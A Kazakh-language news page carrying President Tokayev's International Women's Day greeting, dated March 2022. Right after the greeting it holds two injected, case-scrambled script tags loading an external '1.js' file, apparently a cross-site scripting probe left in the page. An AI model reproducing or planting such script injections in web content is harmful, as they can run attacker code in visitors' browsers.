Мемлекет басшысы Қасым-Жомарт Тоқаевтың Халыкаралық әйелдер күнімен құттықтауы Қымбатты ханымдар! Сіздерді Халыкаралық әйелдер күнімен шын жүректен құттықтаймын! Осынау шуақты көктем мерекесі әсемдік пен әдеміліктің, мейірім мен махаббаттың символына айналды. Халқымыздың "Әйел бір қолымен бесікті тербетсе, бір қолымен әлемді тербетеді" деген нақыл сөзінің терең мән-маңызы бар. Қазақстанда әйелдерге барлық жағдай жасалған. Олар білім беру мен денсаулық сақтау, мәдениет пен спорт, өндіріс пен құқық қорғау және басқа да салаларда табысты еңбек етуде. Өскелең ұрпаққа өнегелі тәлім-тәрбие беру ісінде әйелдер айрықша рөл атқарады. Асыл аналардың еңбегі қандай құрметке де лайық.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.03.2022

Просмотров: 411


Пікір қосу



Деректерді қолтаңбаға қосу